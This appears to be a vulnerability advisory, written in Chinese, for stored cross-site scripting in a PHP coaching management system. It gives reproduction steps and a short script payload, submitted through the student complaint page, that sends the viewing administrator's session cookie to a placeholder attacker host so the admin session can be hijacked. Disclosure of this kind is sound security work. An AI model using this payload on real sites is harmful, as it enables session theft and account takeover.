基于 PHP 的教练管理系统(Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
未知(供应商未提供版本信息;测试基于截至2026年4月 Code-Projects.org 提供的最新可用版本)
CWE-79:Web 页面生成过程中的输入未适当中和(存储型跨站脚本)
该应用未能正确清理投诉和回复功能中用户提供的输入。低权限用户注入的恶意 JavaScript 在更高权限用户(如管理员或教师)查看时被存储并执行。
此外,回复功能同样存在漏洞,允许管理员或教师在学生会话中注入并执行 JavaScript。
这导致影响多个用户角色的存储型 XSS 漏洞。
以学生身份登录
导航至:
/modules/student/complaint.php

提交包含以下有效负载的投诉:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
以管理员身份登录
导航至:
/modules/admin/incomingcomplaint.php

当管理员查看投诉时,有效负载自动执行
管理员会话 cookie 被发送至攻击者控制的服务器
使用窃取的会话 cookie 劫持管理员会话

严重性:严重